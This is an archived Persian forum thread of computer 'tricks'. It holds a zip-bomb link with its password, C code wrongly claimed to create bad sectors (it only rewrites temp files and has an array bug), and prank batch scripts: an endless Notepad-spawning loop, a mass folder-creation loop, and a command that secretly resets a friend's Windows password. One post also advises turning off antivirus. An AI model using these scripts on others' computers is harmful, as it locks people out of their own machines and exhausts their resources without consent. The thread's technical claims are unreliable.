توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : ترفند های عجیب و غریب
Magsoud
09-13-2013, 06:46 PM
مدت مدیدی بود که دخترم گلایه میکرد که چرا نمیروم یک چند روزی میهمان آن ها بشوم ، تا اینکه هفته گذشته
تصمیم گرفتم که پیش عزیز ترین عزیزم بروم.
متاسفانه بعد از رسیدنم به منزل آن ها ، متوجه شدم که از روز قبل تلفن منزل آن ها از کار افتاده و بعد که به
مخابرات مراجعه کرده اند ، گفته شده که رفع این مشکل حدود 10 روز طول خواهد کشید.
معلوم هست که ناراحت شدم چون دیگر نمیتوانستم به اینترنت دسترسی داشته باشم.خواستم برگردم و بعد از
رفع مشکل دوباره به خانه ایشان بروم که با توجه به علاقه شدیدی که بین من و دخترم وجود دارد ، دیدم دخترم
بشدت دلگیر خواهد شد. لذا ماندم و از خیر رفتن به اینترنت گذشتم.
خوشبختانه یک هارد دیسک External با خودم برده بودم که حاوی یادداشت ها ی قدیمی من بود که مدت ها بود
میخواستم آن ها را بررسی کرده و سر و سامان بدهم و چیز هائی را که نمیخواهم را پاک کنم تا جا برای ذخیره
فایل های جدید باز شود.
و با بررسی ها واقعا" بالای صد گیگا بایت از فایل ها را غیر لازم تشخیص داده و پاک کردم و کلی جا خالی شد.
اما در حین مطالعه و بررسی محتویات هارد External نکاتی را دیدم که از یادم رفته بودند ولی هنوز هم بعد از سالیان
دراز ، برایم جالب بودند و تصمیم گرفتم که پاره ای از آن ها را بمرور که حوصله میکنم به اطلاع شما عزیزان هم
برسانم.
=================
======
Zip Bomb
======
فایل فشرده 42 کیلو بایتی زیر را دانلود کنید.
http://www.unforgettable.dk/42.zip
( پسورد فایل فشرده: 42 )
حال این فایل را از فشردگی در بیاورید ، دارای تعداد 16 فایل فشرده دیگر خواهید شد.
هر کدام ار 16 فایل فشرده را داخل پوشه جداگانه ای از فشردگی در بیاورید. خواهید دید که هرکدام تعداد 16 فایل
فشرده دیگر هستند.
همینطور ادامه داده و هر کدام از فایل های فشرده بدست آمده را در پوشه جداگانه ای از فشردگی در بیاورید.
در انتهای کار (پس از 7 مرحله از فشردگی درآوردن) ، خواهید دید که حجم فایل های بدست آمده بیش از 60
گیگا بایت است.
تا بعد.
Mohamad
09-13-2013, 06:57 PM
درود
با سپاس از استاد
یک نکته را اگر استاد بنده را ببخشند باید ذکر کنم و اون پسوورد فایل فشرده هست که این پسوورد عدد
42
هست
توضیح به زبان انگلیسی در محتوا مخفی :
he file contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped, which again contains 16 zipped files, which contain 1 file, with the size of 4.3GB.
So, if you extract all files, you will most likely run out of space :-)
16 x 4294967295 = 68.719.476.720 (68GB) 16 x 68719476720 = 1.099.511.627.520 (1TB) 16 x 1099511627520 = 17.592.186.040.320 (17TB) 16 x 17592186040320 = 281.474.976.645.120 (281TB) 16 x 281474976645120 = 4.503.599.626.321.920 (4,5PB)
با سپاس
Magsoud
09-13-2013, 07:06 PM
سپاسگزارم
من نمیدانم کی دانلود کرده بودم و لذا متوجه نبودم که پسورد دارد
بسیار ممنونم
یه کاربرد خوب واسه این فایل برا موقعیه که بخوایم بعد از پاک کردن محتویات یک درایو داخل ان اطلاعات بیخود بریزیم و بعد فرمت کنیم تا اگه درایو مربوطه به پست یه ادم بازیگوش خورد بدون ایجاد مشکل برای ما مدتی هم ایشان را سرگرم نماید
هرچند برای پاکساری امن دیتا راه های مطمئن و تخصصی و برنامه هایی که نوع رایگانشون هم پیدا میشه موجودند
Mahm00d
09-14-2013, 01:21 AM
درود
استاد من فایل را نمی توانم چک کنم چون اینقدر جا در هاردم ندارم
سوالم اینجاست:
آیا این فایل که اینقدر فشرده شده سالم است؟!
چگونه و با چه نرمافزاری این فایل فشرده شده که اینقدر حجم دارد؟!
:from me :
Magsoud
09-14-2013, 01:46 AM
اگر میخواهی امتحان کنی میشود که به روش زیر عمل کنی تا فایل نهائی فقط 4 گیگا بایت باشد
1. فایل دانلود شده را از فشردگی در بیاور
2. 16 فایل فشرده بدست می آید . فایل اصلی و 15 تا از فایل های بدست آمده را دیلیت کن تا فقط یک فایل بماند.
3. بهمین طریق ادامه بده و از هر 16 فایل بدست آمده فقط یکی را نگهداشته و بقیه را حذف کن. حالا آخری را که از
فشردگی در بیاوری یک فایل dll خواهی داشت که 4 گیگا حجم دارد.
Magsoud
09-15-2013, 05:04 PM
===============
ایجاد Bad sector در هارد
===============
شاید بشود گفت که بدترین مشکلی که ممکن است در رابطه با یک هارد داشته باشیم ، این است که هارد ما
بهر علتی (چه فیزیکی و چه نرم افزاری) ، دارای Bad sector بشود.
زمانیکه نقطه یا نقاطی از هاردی Bad sector بشود ، اطلاعات موجود در این نقاط به احتمال زیاد قابل ریکاور کردن
نخواهند بود.
ویروس هائی هم وجود دارند که کارشان ایجاد Bad sector در هارد می باشد.
نرم افزار های مختلفی هم در رابطه با تعمیر هارد های دارای Bad sector وجود دارند ولی بطور کلی میشود گفت
که این نرم افزار ها هم کار زیادی انجام نمی دهند و بیشتر آن ها فقط نقاط Bad sector را شناسائی کرده و کاری
میکنند که آن قسمت ها از دید ویندوز بیرون باشد و از حجم کلی هارد کم شود تا مجددا" اطلاعاتی در آن جا ها
نوشته نشود.
اما بحث امروزمان:
روزی در صفحه ای از صفحات اینترنت نویسنده کد های زیر را داده بود و نوشته بود که این کد ها را توسط کامپایلر زبان
برنامه نویسی C کامپایل کنید:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define HDSIZE 640000
void handle_sig();
int main() {
int i = 0;
int x;
int fd[5];
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
char *buf;
buf = malloc(HDSIZE);
printf("sekt0r: trashing hard disk with bad sectors!\n");
while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);
for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);
} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */
void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}
و سپس ادامه داده بود که اگر فایل اجرائی حاصل را اجرا کنید ، کارش این است که شروع به ایجاد Bad sector ها
در هارد خواهد کرد و هرچقدر بیشتر کار کند محل های بیشتری از هارد Bad sector خواهد شد و اگر مدت زیادی
کار کند ، تمام هارد غیر قابل استفاده خواهد شد.
==============
من مورد بالا را نه تست کرده ام و نه جرئت میکنم تست کنم و نه مطمئن هستم که اینکار را میکند یا نه؟!
منظور من از این مطلب دو نکته زیر بود:
1. مطلبی را در اینجا قرار دهم که با عنوان تاپیک هماهنگ باشد.
2. مطلب بالا اگر درست باشد میتواند در مورد زیر بهترین نرم افزار باشد:
__ هستند کاربرانی که در هاردشان اطلاعات بسیار مهم و حیاتی را نگهداری کرده اند. حال بهر علتی روزی تصمیم
میگیرند هارد را فرمت کرده و اطلاعات فوق را نابود کنند.
مسلم است که حتی اگر با نرم افزار های مخصوص هم هارد را پاک کنند ، احتمال بازیابی اطلاعات هنوز وجود دارد.
ولی اگر نرم افزار بالا درست کار کند ، میشود مطمئن شد که احتمال ریکاوری بینهایت پائین خواهد بود.
تا بعد
Mahm00d
09-15-2013, 06:14 PM
===============
..........................
2. مطلب بالا اگر درست باشد میتواند در مورد زیر بهترین نرم افزار باشد:
__ هستند کاربرانی که در هاردشان اطلاعات بسیار مهم و حیاتی را نگهداری کرده اند. حال بهر علتی روزی تصمیم
میگیرند هارد را فرمت کرده و اطلاعات فوق را نابود کنند.
مسلم است که حتی اگر با نرم افزار های مخصوص هم هارد را پاک کنند ، احتمال بازیابی اطلاعات هنوز وجود دارد.
ولی اگر نرم افزار بالا درست کار کند ، میشود مطمئن شد که احتمال ریکاوری بینهایت پائین خواهد بود.
تا بعد
درود
تشکر...
استاد اگر کدی که قرار دادید کار کند می تواند کاربرد خراب کاری نیز داشته باشد :d:
(استاد فکر کنم خوبه در سیستم های دانشگاه تستش کنم!:ch0m:)
استاد من درست متوجه نشدم وقتی در هارد بد سکتور ایجاد شود آن سکتور دیگر به درد نخورده و باید آن را با استفاده از نرم افزار هایی کنار گذاشته شود اما ایجاد بد سکتور چگونه باعث می شود که اطلاعات قابل ریکاوری نباشند یعنی خودمان با دست خودمان در هارد بد سکتور ایجاد کنیم که اطلاعات بر نگردد؟!
استاد بهتر نیست از نرم افزار های wipe که برای غیر قابل بازگشت کردن فایل ها کاربرد دارند استفاده کنیم؟!!!!
Magsoud
09-15-2013, 06:23 PM
مسلم است که ایجاد بدسکتور کار درستی نیست
ببینید ، اطلاعات پاک شده موجود در هارد دیسک را میتوان دوباره بدست آورد.
ظاهرا" حتی اگر اطلاعات را با نرم افزار های قوی هم پاک کنیم ، باز هم شرکت هائی هستند که میتوانند
اطلاعات را بازیابی کنند(البته حق الزحمه بسیار بالائی میگیرند).
نکته ای که بنده عرض کردم برای زمانی است که میخواهیم هاردمان را دیگر کسی نتواند استفاده کند.
Mahm00d
09-15-2013, 06:38 PM
...................
ظاهرا" حتی اگر اطلاعات را با نرم افزار های قوی هم پاک کنیم ، باز هم شرکت هائی هستند که میتوانند
اطلاعات را بازیابی کنند(البته حق الزحمه بسیار بالائی میگیرند).
.....................
استاد چگونه این شرکت ها اینکار را انجام می دهند...
وقتی ما فایلی را پاک می کنیم در واقع خود فایل پاک نمی شود بلکه آدرس آن فایل در هارد پاک می شود و نرم افزار های ریکاوری آن آدرس ها شناسایی کرده و اطلاعات را بار گذاری می کنند اما وقتی فایل پاک شود و بر روی آن اطلاعات دیگری در هارد جایگزین می شود در این صورت نرم افزار های ریکاوری نمی تواند فایل را ریکاروری کنند شاید نام فایل و حجمش را شناسایی و بازگردانند اما فایل مورد نظر کار نمی کند
وقتی توسط نرم افزار های wipe بر روی سکتور ها چندین بار اطلاعات پاک و نوشته می شوند چگونه باز اطلاعات قابل بازگشت است ؟!!!
:from me :
Magsoud
09-15-2013, 06:48 PM
محمود جان ، من دقیقا" مطلب را نمیدانم
ولی روزی با دوستی متخصص صحبت میکردم که گفت حتی اگر هارد تکه تکه شود
متخصصینی هستند که امکاناتی دارند که میتوانند اطلاعات را از سخت افزار استخراج
کنند.
و بنده گفته ایشان را در دنیای مدرن امروزی ، دور از واقعیت نمیدانم.
در دنیای امروزی ممکن است رسانه ها بگویند فلان چیز تا کنون کشف و اختراع نشده است ،ولی
در عمل ممکن است اختراع شده باشد و قدرتها استفاده کنند و وقتی تمام استفاده هایشان را
کردند و یا چیز بهتری کشف کردند ، تازه اعلام کنند که امروز فلان چیز کشف شد!!!
Mahm00d
09-15-2013, 06:55 PM
استاد گفته دوست تان کمی شک بر انگیز است وقتی آدرس و خود اطلاعات در هارد پاک شود چگونه می شود فهمید کدام سکتور چه آدرسی و چه اطلاعاتی داشته؟؟؟
من با یکی از استاید دانشگاه مان که استاد منطق دیجیتال هستند در مورد همین مسئله ی ریکاوری صحبت کردم و ایشان هم گفتند وقتی فایلی پاک شود و بر روی آن فایلی جایگزین شود دیگر نمی توان آن را ریکاوری کرد!!!
اگر گفته ی دوست متخصص شما درست باشد حالا مسئله ی جدیدی به وجود می آید حال ما چگونه اطلاعاتمان را پاک کنیم که غیر قابل بازگشت باشد؟؟؟
Magsoud
09-15-2013, 07:04 PM
.....من با یکی از استاید دانشگاه مان که استاد منطق دیجیتال هستند در مورد همین مسئله ی ریکاوری صحبت کردم و ایشان هم گفتند وقتی فایلی پاک شود و بر روی آن فایلی جایگزین شود دیگر نمی توان آن را ریکاوری کرد.......
اولا" جهت اطلاعت عرض کنم که خود بنده هم در زمان جوانی از نظر دوستان ، خدای منطق دیجیتال
بودم و برای شرکت هائی مدارات دیجیتالی طراحی میکردم.. لذا از مطلب زیاد بیخبر هم نیستم.
ثانیا" امروزه ما نرم افزار های ریکاوری ای را می بینیم که در توضیحاتشان گفته میشود که این برنامه
میتواند حتی بعد از چند بار فرمت هم اطلاعات را برگرداند. آیا میشود این گفته دروغ باشد، اگر آره
پس این سازندگان دیوانه اند که با این نوشته ها خود را مضحکه مردم بکنند؟؟
Magsoud
09-19-2013, 03:09 PM
ترفند 3
=========
1.برنامه notepad را باز کرده و عبارت زیر را (با حروف بزرگ) تایپ کنید
.LOG
2. فایل را مثلا" با نام Test.txt ذخیره کنید.
3. حالا فایل Test.txt را اجرا کنید. خواهید دید که فایل تاریخ را هم نشان می دهد
هر بار که این فایل را باز کنید تاریخ جدید تر را خواهد نوشت.
Magsoud
09-22-2013, 01:08 AM
ترفند (4) شوخی با دوستان
=================
فایل Batch با محتوای زیر را درست کرده و فرضا" با نام RUN.BAT ذخیره کنید و بعد به دوستتان بدهید که اجرا کند.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
حال اگر دوستتان آن را اجرا کند ، خاموش کردنش به این سادگی نخواهد بود. و اگر حدو یک دقیقه ادامه داشته
باشد ، جز ری استارت چاره ای نخواهد داشت.
و اگر نوع پیشرفته تر همین فایل را میخواهید از پیوست دانلود کنید.
سلام خدمت همه عزیزان و بزرگواران !
ZipBomb موجود در پست اول بعد از اولین استخراج و اسکن توسط آنتی ویروس NOD32 تماما به عنوان ویروس شناسایی و پاک شد !
متاسفانه بنده قادر به تست ش نشدم !
دوستانی که از پک های امنیتی دیگه ای استفاده میکنند شناسایی نشد ؟
http://p30up.ir/images/yci2klsv4onv6xnv2hy.jpg
:^:
Magsoud
09-22-2013, 12:58 PM
دوست گرامی
نگران نباش ویرس نیست . ضد ویروست را غیر فعال کن و با خیال راحت تست کن
ولی همانطوریکه در عنوان مربوطه هم گفته ام قبلا" ویروسی وجود داشت که بنامZipBomb معروف بود
و کارش دقیقا" این بود که مخفیانه فایلی را که بنده پیوست نمودم را وارد سیستم میکرد و دستوراتی
هم ضمیمه کرده بود که مخفیانه و اتوماتیک این فایل ها پشت سرهم از فشردگی در می آمدند.
و بدیهی است که بعد از مدت زمان کمی تمام هارد که در آن زمان حجم زیادی هم نداشتند پر میشد
و کاربر نمی دانست چرا و در نتیجه نمیدانست چکار کند.
تا اینکه این مسئله کشف شد. و مدت ها نقل مجالس شد.ولی ممکن اسنت بعضی ضد ویروس ها
هنوز آن را ویروس بدانند که اشتباه است.
چون این فایل بهمراه دستورات لازم برای اجرای اتماتیک و مخفی میتواند بدافزار محسوب شود. و بدون
آن دستورات صرفا" یک ترفند بیشتر نیست.
بهر حال حداقل با آنتی ویروس avast و برنامه IObit Malware Fighter مشکلی اعلام نمیشود.
eDvArDo
09-22-2013, 05:10 PM
سلام
استاد جان، بازم ازون كارا؟!
بابا هنوز اون دراومدن و تورفتن مكرر دي وي دي رامم يادم نرفته!
حالا راه حل رفع مشكل رو هم بفرماييد.
بنده كه جرات تست ندارم!!!
مخلص هرچي مرد
Magsoud
09-22-2013, 05:39 PM
راحت ترین راه و سریع ترین راه Restart کردن کامپیوتر است
Magsoud
10-01-2013, 02:25 AM
تغییر پسورد در ویندوز 7 و XP در یک لحظه
=========================
اگر میخواهید به شوخی سر به سر دوستتان بگذارید بطریق زیر عمل کنید:
فایل Batch با محتوای زیر را درست کرده و آن را با نام Pass.cmd ذخیره کنید.
@echo off
net user %username% 12345
حال این فایل را بدون اینکه دوستتان متوجه شود ، در کامپیوتر ایشان اجرا کنید.
اکنون اگر کامپیوتر ری استارت شود ،پسورد خواهد خواست و تا پسورد 12345 را وارد نکنید لاگ آن نخواهد کرد.
Magsoud
10-03-2013, 12:40 PM
ساخت هزاران پوشه در عرض چند ثانیه
=========================
فایل Batch با محتوای زیر را درست کرده و آن را با نام فرضا" Create Folders.cmd ذخیره کنید:
@echo off
:start
md %random%
goto start
حال این فایل را اجرا کنید. در عرض چند ثانیه هزاران پوشه درست خواهد شد.
سلام
آموزه های جالبی هستند، اگر وقت داشته باشید لطفا ادامه بدید
vBulletin v4.2.5, Copyright ©2000-2025, Jelsoft Enterprises Ltd.